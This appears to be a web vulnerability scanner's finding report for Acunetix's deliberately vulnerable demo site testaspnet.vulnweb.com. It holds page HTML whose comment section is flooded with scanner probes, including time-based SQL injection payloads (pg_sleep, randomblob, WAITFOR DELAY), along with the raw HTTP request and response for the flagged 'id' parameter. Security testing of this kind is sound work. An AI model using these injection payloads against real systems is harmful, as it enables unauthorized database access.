class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:42 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:42 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:55 AM</DIV><DIV class="CommentText">"case when cast(pg_sleep(15) as varchar) > ' then 0 else 1 end -- </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:55 AM</DIV><DIV class="CommentText">hvEYyWNN / case when cast(pg_sleep(15) as varchar) > ' then 0 else 1 end </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:55 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:55 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:11 AM</DIV><DIV class="CommentText">case randomblob(1000000) when not null then 1 else 1 end </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:11 AM</DIV><DIV class="CommentText">dw9mwi31acod7upvryfv6obxebdxdh8lzlqc95z2vslghrz10bxgd99ez</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:26 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:27 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:27 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:27 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:27 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:27 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:27 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:41 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:41 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:41 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:41 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:41 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:10 AM</DIV><DIV class="CommentText">case randomblob(100000) when not null then 1 else 1 end </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:11 AM</DIV><DIV class="CommentText">gqmttccb53pzpnquyuxbitmw9gvumvnnfas11fl4ynjhmfkbar387676</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:54 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:54 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:54 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:54 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:44:55 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:12 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:12 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:45:12 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	GET
Parameter	id
Attack	0 WAITFOR DELAY '0:0:15' --
Evidence
Show / hide Request and Response
Request Header - size: 517 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0+WAITFOR+DELAY+%270%3A0%3A15%27+--+ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:48:30 GMT Content-Length: 22933
Response Body - size: 22,933 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0+WAITFOR+DELAY+'0%3a0%3a15'+--+" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWls